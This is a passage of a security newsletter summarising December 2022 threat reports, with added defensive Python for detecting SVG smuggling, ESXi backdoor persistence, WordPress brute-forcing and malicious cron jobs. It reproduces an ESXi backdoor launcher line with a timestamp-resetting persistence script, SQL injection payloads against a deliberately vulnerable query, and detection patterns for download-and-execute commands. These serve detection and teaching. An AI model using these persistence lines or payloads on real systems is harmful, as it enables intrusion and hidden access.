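        self._sessions: Dict[str, Tuple[str, int, float]] = {}   # token -> (user, generation, issued_at)

    def issue(self, user: User) -> str:
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user.name, user.auth_generation, self.clock())
        return token

    def validate(self, token: str, users: Dict[str, User]) -> Optional[str]:
        rec = self._sessions.get(token)
        if rec is None:
            return None
        name, generation, issued_at = rec
        user = users.get(name)
        expired = self.clock() - issued_at > SESSION_TTL
        stale = self.bind and (user is None or generation != user.auth_generation)
        if expired or stale:
            self._sessions.pop(token, None)   # drop it so a replayed token cannot be retried
            return None
        return name


def demo() -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Replay a stolen cookie against both behaviours: (weak store, hardened store) at each step."""
    now = [1_700_000_000.0]                      # controllable clock instead of wall time
    users = {"alice": User("alice", "correct horse battery staple")}
    weak = SessionStore(False, clock=lambda: now[0])
    strong = SessionStore(True, clock=lambda: now[0])
    stolen_weak, stolen_strong = weak.issue(users["alice"]), strong.issue(users["alice"])
    out = {"before_change": (weak.validate(stolen_weak, users), strong.validate(stolen_strong, users))}
    users["alice"].change_password("a new and different one")
    out["after_change"] = (weak.validate(stolen_weak, users), strong.validate(stolen_strong, users))
    now[0] += 31 * 24 * 3600                     # a month on, the absolute TTL finally catches the weak store
    out["after_30_days"] = (weak.validate(stolen_weak, users), strong.validate(stolen_strong, users))
    return out


if __name__ == "__main__":
    for step, (weak_result, strong_result) in demo().items():
        print(f"{step:>15}: weak store -> {weak_result!r}, hardened store -> {strong_result!r}")
```

The same generation bump belongs on 2FA enrolment or removal, email changes and administrative 'sign out everywhere' actions; the check costs one extra comparison per request, and it is what turns a 30-day stolen cookie into a dead one the moment the victim reacts.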
Kulshrestha, Sparsh and Mayank Satnalika, Security Flaw in Atlassian Products (Jira, Confluence,Trello, BitBucket) Affecting Multiple Companies, blog post, 13 December 2022. Available online at https://cloudsek.com/security-flaw-in-atlassian-products-jira-confluencetrello-bitbucket-affecting-multiple-companies/.
Qakbot Smuggles HTML in SVG Images
Your humble scribe fondly remembers the days of 7-bit ASCII email, before the evils of HTML formatting and massive MIME attachments. In particular, the shift to using highly-capable web browser engines as email clients (rather than dumb text-only MUAs) opened up a world of possibilities for malicious users, who now have access to sophisticated scripting, cross-site scripting and other vectors.
However, crude embedding of malicious JavaScript code can easily be detected by network gateways and other security devices, so attackers have developed HTML smuggling techniques, which obfuscate or encode their payloads to evade detection. Cisco Talos researchers recently found a new technique used by the Qakbot banking trojan/stealer, which involves a particularly convoluted unpacking chain to infect the victim's computer.
The malicious email carries an HTML attachment, which in turn contains an SVG (Scalable Vector Graphics) image. SVG images are defined as XML markup tags, which in this case contain embedded HTML <script> tags. These, in turn, contain JavaScript which carries a base64-encoded password-protected ZIP file, which the user is prompted to open with a supplied password. And if the victim falls for this, they will find it unzips to an ISO file which infects their machine.
Once the machine is infected, Qakbot hijacks existing email threads to propagate itself to still more victims. The process may be long and convoluted, but it works, and it works well to evade detection by security devices.
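The chain in that attack leaves a recognisable footprint in the attachment itself: an SVG element carrying a <script>, and inside it a long base64 string that decodes to an archive. As an added example (not Talos code), here is a scanner that walks an HTML attachment with Python's HTMLParser, pulls base64 runs out of script bodies, identifies what they decode to, and lists the archive's member names (which remain readable even in a password-protected ZIP). The sample HTML and its embedded archive are constructed in the code, not taken from a real Qakbot lure.

```python
"""Flag HTML attachments that smuggle a payload through an SVG <script>.
Added example for this article; not Talos code. The sample lure is constructed, not a real Qakbot file."""
import base64
import binascii
import io
import re
import zipfile
from html.parser import HTMLParser
from typing import Dict, List

# A long run of base64 alphabet inside a script is the usual tell for an embedded blob.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
RISKY_MEMBERS = (".iso", ".img", ".lnk", ".js", ".vbs", ".exe", ".dll", ".scr")


def identify(blob: bytes) -> str:
    if blob.startswith(b"PK\x03\x04"):
        return "zip"
    if blob.startswith(b"MZ"):
        return "pe"
    if len(blob) > 0x8006 and blob[0x8001:0x8006] == b"CD001":   # ISO 9660 volume descriptor
        return "iso"
    return "unknown"


class SvgSmugglingScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.svg_depth = 0
        self.in_script = False
        self.script_in_svg = False
        self._buf: List[str] = []
        self.svg_scripts = 0
        self.payloads: List[Dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        elif tag == "script":
            self.in_script = True
            self.script_in_svg = self.svg_depth > 0
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1
        elif tag == "script" and self.in_script:
            self.in_script = False
            if self.script_in_svg:
                self.svg_scripts += 1
            self._inspect("".join(self._buf))

    def handle_data(self, data):
        if self.in_script:
            self._buf.append(data)          # buffer: the parser may hand script text over in pieces

    def _inspect(self, script: str) -> None:
        for m in B64_RUN.finditer(script):
            try:
                blob = base64.b64decode(m.group(0), validate=True)
            except binascii.Error:
                continue
            kind, members = identify(blob), []
            if kind == "zip":
                try:
                    with zipfile.ZipFile(io.BytesIO(blob)) as z:
                        members = z.namelist()   # readable even when the archive is password-protected
                except zipfile.BadZipFile:
                    pass
            self.payloads.append({"kind": kind, "size": len(blob), "members": members,
                                  "inside_svg": self.script_in_svg})


def analyze(html_text: str) -> Dict:
    s = SvgSmugglingScanner()
    s.feed(html_text)
    s.close()
    risky = any(p["kind"] in ("zip", "pe", "iso") or
                any(n.lower().endswith(RISKY_MEMBERS) for n in p["members"]) for p in s.payloads)
    return {"svg_scripts": s.svg_scripts, "payloads": s.payloads, "suspicious": risky}


def constructed_sample() -> str:
    """Synthetic lure: a ZIP (holding a stand-in for the ISO stage) inlined in an SVG <script>."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("invoice.iso", b"\x00" * 512)
    b64 = base64.b64encode(buf.getvalue()).decode()
    return ("<html><body><p>Please review the attached document.</p>\n"
            '<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">\n'
            '<script type="text/javascript">\n'
            'var payload = "' + b64 + '";\n'
            "var bytes = atob(payload);\n"
            "/* ...build a Blob from bytes and trigger a download of the .zip... */\n"
            "</script>\n</svg></body></html>")


if __name__ == "__main__":
    print(analyze(constructed_sample()))
```

A mail gateway that renders nothing will still see the base64 run and the PK header once the script body is decoded; the archive's password protects its contents, not its member list, so an .iso or .lnk name inside is enough to quarantine on.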
Katz, Adam and Jaeson Schultz, HTML smugglers turn to SVG images, blog post, 13 December 2022. Available online at https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/.
FBI Takes Down 48 DDoS Sites, DoJ Charges Six Defendants
The FBI is in the process of seizing 48 internet domains associated with web sites offering DDoS-for-hire services, commonly called "booter" services. The sites had been used to launch millions of attempted - and some successful - distributed denial of service attacks worldwide, targeting educational institutions, government agencies, gaming platforms and millions of individuals, disrupting their services and internet connections.
Although the sites claimed to offer "stresser" services, purportedly for performance-testing one's own networks and servers, the FBI determined that this was mere pretence, and that "thousands of communications between booter site administrators and their customers . . . make clear that both parties are aware that the customer is not attempting to attack their own computers", according to an affidavit filed in support of the court-authorised seizure warrants.
At the same time, prosecutors in both Los Angeles and Alaska filed charges against six defendants across the US, who each allegedly offered one-stop DDoS services, with subscriptions of various lengths and attack volumes. In each case, the FBI posed as a customer and was able to conduct test attacks to confirm that the "booter" site functions as advertised.
The FBI, in conjunction with the UK National Crime Agency and the Netherlands Police, has launched a campaign using ads placed in search engines, triggered by the keywords associated with DDoS activities - the idea being to deter naive would-be-criminals searching for DDoS services and educate the public on their illegality.
Mrozek, Thom, Federal Prosecutors in Los Angeles and Alaska Charge 6 Defendants with Operating Websites that Offered Computer Attack Services, news release, 14 December 2022. Available online at https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites.
News Stories
TPG Exchange Servers Breached
Australian telco TPG Telecom has notified the Australian Securities Exchange (ASX) that its security consultants, Mandiant, found evidence of unauthorised access to a hosted Microsoft Exchange service which provides email accounts for up to 15,000 business customers of its iiNet and Westnet brands. The announcement gave no indication of the timeframe of the breach - only that it was discovered on 13 December as part of "Mandiant's ongoing engagement to assist with cyber protection", during which Mandiant conducted a "forensic historical review and discovered the unauthorised access".
The analysis revealed that the primary purpose of the threat actor was to search for customers' cryptocurrency and financial information. The unauthorised access has been blocked, additional controls put in place, and all affected customers are being contacted.
2022 has been a bad year for Microsoft Exchange users; one wonders why they keep using it. . .
Rickards, James, Unauthorised access to Hosted Exchange service, market announcement, 14 December 2022. Available online at https://www.asx.com.au/asx/statistics/displayAnnouncement.do?display=pdf&idsId=02612242.
Australia Considers Sanctions on Medibank Hackers
Having introduced Magnitsky Act-like laws to permit international sanctions, the Australian Government is now considering using them against cybercriminals for the first time. The government has previously sanctioned Iran's 'morality police' as well as Iranians and Russians linked to human rights abuses.
The Department of Foreign Affairs and Trade has provided advice to the Minister, Penny Wong, about possible use of these cyber-related powers. In a response tabled to a Senate question on notice, the Department stated, "The department routinely provides advice to ministers on possible sanctions measures, including cyber sanctions".
Hurst, Daniel, Russian Medibank hackers could be first targets of Australian sanctions against cyber-attackers, The Guardian, 15 December 2022. Available online at https://www.theguardian.com/australia-news/2022/dec/15/russian-medibank-hackers-could-be-first-targets-of-australian-sanctions-against-cyber-attackers.
InfraGard Member List Compromised via Social Engineering
The FBI runs a threat information sharing network called InfraGard, which has more than 80,000 members - supposedly vetted individuals in physical and cyber security roles at private-sector critical infrastructure companies. Now the InfraGard portal and membership database have been breached by a simple but audacious social engineering attack.
Security blogger Brian Krebs reports that a thread offering the InfraGard database for sale was posted to a relatively new cybercrime forum called 'Breached'. The database contains the names and contact information for tens of thousands of InfraGard members. The seller is using the handle 'USDoD', with the Defense Department's seal as their avatar, and is asking for $US50,000 - perhaps a bit optimistically, considering much of the information is already publicly available.
The breach was accomplished by submitting a phony membership application using the name, Social Security Number, date of birth and other personal details of a finance corporation CEO. InfraGard requires identity verification by either email or telephone - and while the attacker controlled a suitable email address, they chanced using the CEO's genuine mobile phone number. They got lucky: a month later they received an email stating that their application had been approved.
From there, the attacker had a friend write a Python script to query an API on the InfraGard website, and the data was theirs. As Krebs wrote his article, USDoD still had access to the InfraGard site and was using it to message members.
Krebs, Brian, FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked, blog post, 13 December 2022. Available online at https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/.
FortiOS 0day Exploited In The Wild
Fortinet has been having a bad year, and it continues: the company has issued an advisory for a heap-based buffer overflow in sslvpnd, the SSL VPN daemon of its FortiOS software. The vulnerability allows a remote unauthenticated attacker to execute arbitrary code or commands via specially-crafted requests, and Fortinet is aware of at least one instance of exploitation in the wild.
The advisory provides multiple IOCs which customers should check for immediately; the recommended workaround is to disable the SSL VPN service. The permanent fix is, of course, to upgrade to a fixed version of FortiOS.
Fortinet PSIRT, FortiOS - heap-based buffer overflow in sslvpnd, PSIRT advisory, 12 December 2022. Available online at https://www.fortiguard.com/psirt/FG-IR-22-398.
Citrix ADC and Gateway Exploits In The Wild
Citrix has released builds to fix a critical vulnerability, CVE-2022-27518, which affects Citrix ADC and Citrix Gateway versions 12.1 and 13.0 when configured as a SAML SP (service provider) or IdP (identity provider); build 13.0-58.32 is not affected. The vulnerability is being exploited in the wild, and customers are urged to update as soon as possible or take other measures to mitigate the problem.
CVE-2022-27518 is classed as 'improper control of a resource through its lifetime' (CWE-664) - probably a memory-safety problem such as a use-after-free - which allows an unauthenticated attacker remote code execution.
The National Security Agency has also issued a guidance document with advice on threat hunting steps Citrix customers can take to look for artifacts on their devices which may be attributed to APT5, also known as Keyhole Panda, UNC2630 and MANGANESE.
Lefkowitz, Peter, Critical security update now available for Citrix ADC, Citrix Gateway, blog post, 13 December 2022. Available online at https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/.
National Security Agency, APT5: Citrix ADC Threat Hunting Guidance, guidance document, 13 December 2022. Available online at https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF.
News Stories
Python Backdoor Gives Access to VMware ESXi Servers
VMware's ESXi is a popular virtualization platform with a lightweight UNIX-like host OS; on boot it loads a near-fresh root filesystem into RAM, with only a very few files being preserved across reboots. One of these is /etc/rc.local.d/local.sh, which allows customization of the startup process, although it is normally empty apart from a few comments explaining its purpose and a final 'exit 0'.
In October, Juniper Threat Labs researchers discovered a backdoor implanted on an ESXi server: the attacker had added eight lines of code to /etc/rc.local.d/local.sh, which in turn appended a single line to another startup file, /bin/hostd-probe.sh, and then reset the mtime and atime of the modified file to those of the original in order to evade detection. That single line launches a Python program:
/bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1&
Being Python, the program could run on any POSIX-style platform, but there are indications it is ESXi-specific: the filename is a giveaway, as is a VMware copyright notice at the top of the code, both intended to reassure anyone investigating. When run, the code launches a simple web server which accepts password-protected POST requests either to run arbitrary commands and return the output as a web page, or to launch a reverse shell to the attacker's netcat listener. Curiously, this web server binds to localhost:8008, so the attackers also reconfigure the ESXi reverse HTTP proxy to forward requests to it.
The initial compromise which allowed installation of the backdoor could not be determined, but the default port for the reverse shell is 427 which, perhaps not coincidentally, is also the port used by OpenSLP, the Service Location Protocol implementation on ESXi - quite probably the service which was exploited to gain access.
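A practical follow-up is to check those persistence points by content rather than by timestamp, since the attacker reset mtime and atime. The following is an added example, not Juniper's code: functions that take the contents of local.sh, hostd-probe.sh and the reverse proxy's endpoints.conf and report anything outside the expected shape. The sample file contents are constructed stand-ins (the stock ESXi files differ in their exact comment text, and the endpoints.conf field layout of 'namespace type port access redirect' is an assumption on my part), and the baseline port set is something you would capture from a known-good host, never from the suspect one.

```python
"""Content checks for the ESXi persistence points described above.
Added example for this article; not Juniper's code. Sample file contents are constructed stand-ins."""
import hashlib
import re
from typing import List, Set


def suspicious_local_sh(text: str) -> List[str]:
    """Stock local.sh is comments plus a final 'exit 0'; return every line that is neither."""
    return [line.strip() for line in text.splitlines()
            if line.strip() and not line.strip().startswith("#") and line.strip() != "exit 0"]


# Traits of the appended launcher line: detached, silenced, Python, dropped under /store/packages.
PROBE_INDICATORS = (
    re.compile(r"\bnohup\b"),
    re.compile(r"\bpython[0-9.]*\b"),
    re.compile(r"/store/packages/"),
    re.compile(r">\s*/dev/null\s+2>&1\s*&"),
)


def suspicious_hostd_probe(text: str) -> List[str]:
    return [line.strip() for line in text.splitlines()
            if any(p.search(line) for p in PROBE_INDICATORS)]


def audit_endpoints(text: str, baseline_ports: Set[int]) -> List[str]:
    """Flag rhttpproxy endpoints forwarding to a local port not seen on a known-good host.
    Assumed line layout: '<namespace> <local|remote> <port> <access> <redirect>'."""
    flagged = []
    for line in text.splitlines():
        fields = line.split()
        if (len(fields) >= 3 and fields[1] == "local" and fields[2].isdigit()
                and int(fields[2]) not in baseline_ports):
            flagged.append(line.strip())
    return flagged


def content_hash(text: str) -> str:
    """Diff against a hash from a clean host: the attacker reset mtime/atime, so timestamps prove nothing."""
    return hashlib.sha256(text.encode()).hexdigest()


# --- constructed samples (not captured from a real host) ---------------------------------------
CLEAN_LOCAL_SH = """#!/bin/sh
# local configuration options (constructed stand-in for the stock file)
# Note: modify at your own risk!
exit 0
"""

# Schematic of what the page describes: append the launcher to hostd-probe.sh, then restore timestamps.
BACKDOORED_LOCAL_SH = CLEAN_LOCAL_SH.replace("exit 0", """\
grep -q vmtools.py /bin/hostd-probe.sh || echo '/bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1&' >> /bin/hostd-probe.sh
touch -r /bin/hostd-probe /bin/hostd-probe.sh
exit 0""")

CLEAN_HOSTD_PROBE = """#!/bin/sh
# constructed stand-in for the stock probe script
/bin/hostd-probe "$@"
"""

BACKDOORED_HOSTD_PROBE = CLEAN_HOSTD_PROBE + "/bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1&\n"

ENDPOINTS_CONF = """/ local 8309 redirect allow
/sdk local 8307 redirect allow
/ui local 8308 redirect allow
/vpxa local 8089 allow allow
/update local 8008 allow allow
"""
KNOWN_GOOD_PORTS = {8307, 8308, 8309, 8089}   # capture this from a clean host, not from the suspect


if __name__ == "__main__":
    print("local.sh extras:", suspicious_local_sh(BACKDOORED_LOCAL_SH))
    print("hostd-probe.sh hits:", suspicious_hostd_probe(BACKDOORED_HOSTD_PROBE))
    print("odd endpoints:", audit_endpoints(ENDPOINTS_CONF, KNOWN_GOOD_PORTS))
```

On a live host you would feed these functions the output of `cat` over SSH or a copy of the state archive, and compare content_hash() against a fleet baseline; a listening socket on 8008 and a python process with a /store/packages path are the corresponding runtime checks.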
The Juniper blog post provides suggested mitigations and pointers to likely IOC's.
Langton, Asher, A Custom Python Backdoor for VMWare ESXi Servers, blog post, 9 December 2022. Available online at https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers.
Chrome Adds Passkey Support
Google has announced that passkey support is now available in Chrome Stable M108, for the Windows 11, macOS and Android platforms. The Android implementation will sync passkeys securely via the Google Password Manager (or, in upcoming versions of Android, any other password manager that supports passkeys).
Passkeys are intended to replace passwords, with all their problems and vulnerabilities, with public-key authentication: passkeys are far more secure, are not exposed in server breaches (the server holds only a public key), and resist phishing because each credential is bound to the site's origin. However, they require web sites and applications to support the W3C WebAuthn API, which is rapidly being deployed on popular sites.
A passkey saved on a device will automatically show up in autofill when the user signs in to a site, and on a desktop device the user can also use a passkey from a nearby mobile device; the browser will relay the authentication traffic between the remote server and the mobile device. In all cases, the private key component of the passkey never leaves the mobile device (rather like the way SSH supports agent forwarding).
Sarraf, Ali, Introducing passkeys in Chrome, Chromium blog, 8 December 2022. Available online at https://blog.chromium.org/2022/12/introducing-passkeys-in-chrome.html.
French Retailer Intersport DOS'ed by Hive Ransomware
Black Friday sales at the French stores of sports retail giant Intersport were badly disrupted when cash registers were shut down and loyalty card and gift card services were also unavailable. Store staff were forced to keep paper records and perform checkouts manually, causing delays.
The cause was a ransomware attack on 23 November, for which credit has been claimed by the Hive ransomware-as-a-service group on its leak site; just why Hive has done so is unclear, but it may be intended to pressure Intersport into negotiating a ransom. Intersport would not elaborate, but says it does not believe customer data was accessed.
Cluley, Graham, Hive ransomware gang claims responsibility for attack on Intersport that left cash registers disabled, blog post, 13 December 2022. Available online at https://www.bitdefender.com/blog/hotforsecurity/hive-ransomware-gang-claims-responsibility-for-attack-on-intersport-that-left-cash-registers-disabled/.
Botnet Brute-Forces WordPress Sites
FortiGuard Labs has published an analysis of a newly-discovered botnet, GoTrim, which scans for self-hosted WordPress sites and brute-forces their administrator logins. Once the botnet chances upon valid credentials, it infects the site with a copy of itself and contacts its C2 server.
GoTrim is written in Go and takes advantage of the language's concurrency features to perform multiple tasks simultaneously. It is statically linked, and it erases itself after execution so that no trace is left behind - although this also means it does not persist on the victim system. It checks whether a site is hosted on wordpress.com and, if so, moves on, preferring self-hosted sites, which are generally less well defended.
The bot can operate in two modes - client mode, in which it sends HTTP POST requests to its C2 server, or server mode, in which it listens for incoming POST requests. It can also detect other CMSs, as well as the open-source e-commerce platform OpenCart.
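On the defender's side, a brute-force run like GoTrim's shows up in the web server logs long before the credentials fall. Here is an added example (not FortiGuard's code): a sliding-window count of login POSTs per source address over Apache-style combined log lines, flagging any address that exceeds a threshold. The log lines, addresses and threshold are constructed for the demo. Rate-limiting or a CAPTCHA on wp-login.php and xmlrpc.php, and disabling XML-RPC where nothing needs it, are the obvious follow-ups once the source is identified.

```python
"""Spot WordPress login brute-forcing in Apache-style access logs.
Added example for this article; not FortiGuard's code. Log lines, addresses and threshold are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")   # xmlrpc.php is the other favourite brute-force surface


def parse(line: str) -> Optional[Tuple[str, datetime, str, str]]:
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?", 1)[0]


def login_bursts(lines: List[str], window: timedelta = timedelta(minutes=5),
                 threshold: int = 20) -> Dict[str, int]:
    """Peak number of login POSTs from each source inside any sliding window; only sources at/over threshold."""
    attempts: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] in LOGIN_PATHS:
            attempts[rec[0]].append(rec[1])
    flagged: Dict[str, int] = {}
    for ip, times in attempts.items():
        times.sort()
        peak = start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide the window's left edge forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def constructed_log() -> List[str]:
    """Synthetic combined-format lines: one bot hammering wp-login.php, two ordinary visitors."""
    base = datetime(2022, 12, 13, 10, 0, 0)
    stamp = lambda t: t.strftime("%d/%b/%Y:%H:%M:%S +0000")
    ua = '"-" "Mozilla/5.0"'
    lines = [f'198.51.100.7 - - [{stamp(base + timedelta(seconds=5 * i))}] "POST /wp-login.php HTTP/1.1" 200 4321 {ua}'
             for i in range(25)]                                   # 25 attempts in two minutes
    lines += [
        f'203.0.113.5 - - [{stamp(base)}] "GET /wp-login.php HTTP/1.1" 200 2345 {ua}',
        f'203.0.113.5 - - [{stamp(base + timedelta(seconds=20))}] "POST /wp-login.php HTTP/1.1" 302 0 {ua}',
        f'203.0.113.5 - - [{stamp(base + timedelta(seconds=40))}] "POST /wp-login.php HTTP/1.1" 302 0 {ua}',
        f'192.0.2.9 - - [{stamp(base + timedelta(minutes=1))}] "GET /index.php HTTP/1.1" 200 9000 {ua}',
    ]
    return lines


if __name__ == "__main__":
    print(login_bursts(constructed_log()))   # only the bot should appear
```

A distributed botnet will spread attempts across many addresses, so the per-source count is the first filter, not the last; the same window logic applied to the whole site, or to 200-status responses to POST /wp-login.php (a successful login normally redirects with 302), catches the slower, spread-out variant.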
FortiGuard Labs, GoTrim: Go-based Botnet Actively Brute Forces WordPress Websites, blog post, 12 December 2022. Available online at https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites.
News Stories
JSON Allows SQL Injection to Bypass Web Application Firewalls
Claroty's Team82 has developed a generic technique which allowed them to bypass web application firewalls while delivering SQL injection payloads.
SQL injection remains one of the leading vulnerabilities in web applications, in large part because of the constant demand for web developers who, without proper security education, copy code fragments from sites like Stack Overflow without realising that they are just that - fragments intended to demonstrate a technique, not fully-formed code ready to be pasted into a finished application (a 2018 study suggested that roughly 50% of answers to PHP questions contain SQL injection vulnerabilities).
The correct fix, of course, is to educate developers and use parameterised queries, but in the meantime many organisations depend on web application firewalls, which can detect and block a range of attacks on web applications. However, the technique developed by Team82 works by adding JSON syntax to the SQL injection payloads - and because many WAFs lacked JSON support (even though the major databases added it years ago) this threw the WAF's SQL parser for a loop, allowing the injection to pass.
The technique worked on all but one of the WAFs the researchers tested; after they notified the vendors, JSON support has been added to their products. The Team82 researchers also added support for the technique to the popular open-source exploitation tool SQLMap, for use by penetration testers.
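To make the mechanism concrete, here is an added example (not Team82's code, and not a real WAF): a naive signature 'WAF' that knows the classic literal tautology, a string-built login query against an in-memory SQLite database, and the same query done properly with bound parameters. The JSON-bearing payload uses SQLite's json_extract(), so it needs SQLite built with JSON support (the default since 3.38, and present in stock Python builds); the table, credentials and payload strings are constructed for the demo. Real WAFs tokenise SQL rather than pattern-match, and the actual bypass exploited their parsers' ignorance of JSON grammar, but the outcome is the same: the filter passes a tautology it does not understand, and only the parameterised query is safe regardless of what the filter knows.

```python
"""JSON-flavoured SQL injection slipping past a naive filter, and the parameterised fix.
Added example for this article; not Team82's code and not a real WAF."""
import re
import sqlite3
from typing import Dict, List

# Constructed stand-in for a signature-based WAF: it knows the classic literal tautology,
# UNION SELECT and comment tricks, but has no notion of JSON functions or operators.
SIGNATURES = [
    re.compile(r"\bor\b\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),   # OR 1=1, OR 'a'='a'
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    re.compile(r"--|/\*|;\s*drop\b", re.I),
]


def waf_blocks(value: str) -> bool:
    return any(sig.search(value) for sig in SIGNATURES)


def make_db() -> sqlite3.Connection:
    """Constructed users table; needs SQLite built with JSON support (default since 3.38, present in stock Python)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret!"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    # The bug: attacker-controlled text is spliced into the statement.
    sql = f"SELECT username FROM users WHERE username = '{username}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    # The fix: bound parameters are data, never SQL, whatever they contain.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


CLASSIC = "' OR '1'='1"
# Same tautology, but the left-hand side is a JSON lookup the filter does not recognise as a literal.
JSON_TAUTOLOGY = "' OR json_extract('{\"a\":\"x\"}','$.a')='x"


def run_scenario(password_field: str) -> Dict:
    """Send one password-field payload through the filter, the vulnerable query and the safe query."""
    conn = make_db()
    result: Dict = {"blocked_by_waf": waf_blocks(password_field)}
    if not result["blocked_by_waf"]:
        result["vulnerable_rows"] = login_vulnerable(conn, "admin", password_field)
    result["safe_rows"] = login_safe(conn, "admin", password_field)
    return result


if __name__ == "__main__":
    for name, payload in (("classic", CLASSIC), ("json", JSON_TAUTOLOGY)):
        print(name, run_scenario(payload))
```

The resulting statement for the JSON payload is perfectly valid SQL - `... AND password = '' OR json_extract('{"a":"x"}','$.a')='x'` - and returns every row from the string-built query, while the bound-parameter version returns nothing because the whole payload is compared, as text, against the password column.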
Moshe, Noam, {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF, blog post, 8 December 2022. Available online at https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf.
Laurent22, Potential SQL injections vulnerabilities in Stack Overflow PHP questions, automated analysis report, July 2018. Available online at https://laurent22.github.io/so-injections/.
New Waves of Truebot Attacks
Cisco Talos security researchers are reporting an increase in infections by Truebot (also known as Silence.Downloader). Previously, Truebot was spread via malmails and mainly infected desktop and laptop systems inside corporate networks. The new wave uses two new initial infection vectors.
In August, the researchers noticed a small number of cases in which Truebot was run following exploitation of a vulnerability in the IT auditing product Netwrix Auditor; since this tool is rarely Internet-facing, the infections remained limited. In October a second wave began, this time delivered via Raspberry Robin malware, which usually spreads via USB drives. Between them, these two vectors assembled a botnet of over 1,000 systems worldwide, with a particular focus on Mexico, Brazil and Pakistan. Since November, the attackers have switched to an as-yet-unknown delivery mechanism which has infected over 500 Internet-facing Windows servers in the US, Canada and Brazil.
Post-compromise, the current versions of Truebot download either Cobalt Strike reverse shell or Grace malware payloads, typically followed by a custom 'Teleport' exfiltration tool. However, in some cases, the threat actors go on to deploy Clop ransomware as part of a double extortion attack.
These campaigns seem to involve two different groups: Silence Group, who are originally responsible for Truebot, and TA505, a.k.a. Evil Corp, who are associated with the Grace malware.
Pereira, Tiago, Breaking the silence - Recent Truebot activity, threat advisory, 8 December 2022. Available online at https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/.
Linux Servers Targeted for Cryptomining and More With Chaos RAT
For some time, cryptojacking threat groups have been targeting Linux instances in the cloud, generally following the same sequence after gaining initial access: kill off any competing malware and security products, establish persistence, and execute a Monero cryptominer. But in November Trend Micro researchers observed a new pattern: in this case a remote access trojan called Chaos (Trojan.Linux.CHAOSRAT) is installed alongside the XMRig miner.
The infection establishes persistence with a cron job which re-downloads and reinstalls the malware from Pastebin every 10 minutes, and it also installs copies in several locations to evade removal. The download server for the other payloads is hosted in Russia, but once the Chaos RAT is installed it connects to a C2 server which appears to be in Hong Kong, reporting the detailed configuration of the infected machine.
The RAT is written in Go and has quite comprehensive capabilities: it can provide a reverse shell; upload, download and delete files; take screenshots; and restart or shut down the computer. This suggests that the threat actor is considering broadening their activities beyond cloud-based cryptomining.
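The persistence mechanism here - a high-frequency cron job that pulls a script from a paste site and pipes it into a shell - is easy to spot if you look for it. As an added example (not Trend Micro's code), the function below audits a crontab's contents for exactly those traits: run interval, download-and-pipe-to-shell, paste-site URLs, run-time base64 decoding and execution from world-writable temp directories. The crontab text is constructed, the paste-site list and the 'too frequent' threshold are my assumptions rather than indicators from the report, and the paste URL is a placeholder.

```python
"""Crontab audit for download-and-execute persistence.
Added example for this article; not Trend Micro's code. Indicator lists and thresholds are assumptions."""
import re
from typing import List, Optional, Tuple

PASTE_SITES = re.compile(r"pastebin\.com|paste\.ee|hastebin|ghostbin|transfer\.sh", re.I)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|da|z)?sh\b", re.I)
DECODE_AT_RUNTIME = re.compile(r"\bbase64\s+(-d|--decode)\b", re.I)
TEMP_EXEC = re.compile(r"(^|[\s;|&])(/tmp|/var/tmp|/dev/shm)/\S+")


def minute_interval(field: str) -> Optional[int]:
    """Shortest gap in minutes implied by a crontab minute field; None if the syntax isn't handled."""
    if field == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", field)
    if step:
        return int(step.group(1))
    if re.fullmatch(r"\d+(,\d+)*", field):
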